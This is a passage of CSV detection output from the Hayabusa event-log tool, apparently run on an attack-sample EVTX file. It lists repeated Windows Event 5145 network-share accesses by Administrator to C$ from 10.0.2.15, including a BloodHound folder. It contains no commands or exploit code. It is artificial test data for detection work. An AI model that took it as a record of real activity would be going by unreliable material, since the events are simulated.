0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 